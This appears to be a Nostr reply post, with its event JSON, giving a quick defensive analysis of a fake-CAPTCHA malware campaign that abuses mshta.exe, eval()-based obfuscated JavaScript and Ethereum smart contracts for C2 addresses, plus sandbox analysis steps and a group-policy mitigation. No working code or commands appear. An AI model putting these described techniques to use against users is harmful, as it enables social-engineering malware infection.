Unfortunately, I don’t have much time to dive deeply into this right now, but off the top of my head, this looks like a sophisticated attack leveraging mshta(.)exe to execute malicious code outside the browser sandbox.
The fake CAPTCHA trick is clever, as it uses social engineering to get users to run a command that fetches a second-stage payload.
The obfuscated JavaScript on the site is constructing and executing the payload dynamically using eval(). The use of Ethereum smart contracts for storing or distributing C2 server addresses is particularly notable—there is a growing trend in malware campaigns to leverage blockchain technology for resilience, as blockchain-based infrastructure is much harder to disrupt.
To figure out what the stage 2 payload does, you’d need to:
1. Capture the payload: Use a network proxy or sandbox to intercept the HTTP request made by mshta(.)exe and retrieve the payload.
2. Deobfuscate the JavaScript: Tools like jsbeautifier can help reveal how the payload is constructed.
3. Analyze the payload: Static and dynamic analysis in a controlled environment should provide insight into its behavior.
Blocking mshta(.)exe via group policies is a good mitigation step if it’s not required in your environment. Again, I’m swamped at the moment, but I hope this helps as a starting point. Let me know what you find out.
Ava ॐ
npub1f6…azcka
2025-03-30 01:31:55
in reply to nevent1q…gcch
Author Public Key
npub1f6ugxyxkknket3kkdgu4k0fu74vmshawermkj8d06sz6jts9t4kslazckaPublished at
2025-03-30 01:31:55Event JSON
{
"id": "d11150a23b80f10931d8e693472c06b33b69d0dd843b14c8890facb32a2e5176",
"pubkey": "4eb88310d6b4ed95c6d66a395b3d3cf559b85faec8f7691dafd405a92e055d6d",
"created_at": 1743298315,
"kind": 1,
"tags": [
[
"e",
"f4a45b71b39d2c9a8c811cb4e2b1d9fcde8802ea2b691e2a4385d06806a7c8e5",
"",
"root"
],
[
"p",
"4eb88310d6b4ed95c6d66a395b3d3cf559b85faec8f7691dafd405a92e055d6d"
],
[
"p",
"bbdedff375aca666cb20dc1ed2c1ff7cdff87d87aef0ea554f0078af79a72576"
]
],
"content": "Unfortunately, I don’t have much time to dive deeply into this right now, but off the top of my head, this looks like a sophisticated attack leveraging mshta(.)exe to execute malicious code outside the browser sandbox. \n\nThe fake CAPTCHA trick is clever, as it uses social engineering to get users to run a command that fetches a second-stage payload.\n\nThe obfuscated JavaScript on the site is constructing and executing the payload dynamically using eval(). The use of Ethereum smart contracts for storing or distributing C2 server addresses is particularly notable—there is a growing trend in malware campaigns to leverage blockchain technology for resilience, as blockchain-based infrastructure is much harder to disrupt.\n\nTo figure out what the stage 2 payload does, you’d need to:\n\n1. Capture the payload: Use a network proxy or sandbox to intercept the HTTP request made by mshta(.)exe and retrieve the payload.\n\n2. Deobfuscate the JavaScript: Tools like jsbeautifier can help reveal how the payload is constructed.\n\n3. Analyze the payload: Static and dynamic analysis in a controlled environment should provide insight into its behavior.\n\nBlocking mshta(.)exe via group policies is a good mitigation step if it’s not required in your environment. Again, I’m swamped at the moment, but I hope this helps as a starting point. Let me know what you find out.",
"sig": "24b1cfd06031e06553d29828d40ee1d49752793801009c0feb79a64c2ba603d5a4f70403e521b767fabb78c665818f35010900bd270fac57f78d82a340ec6567"
}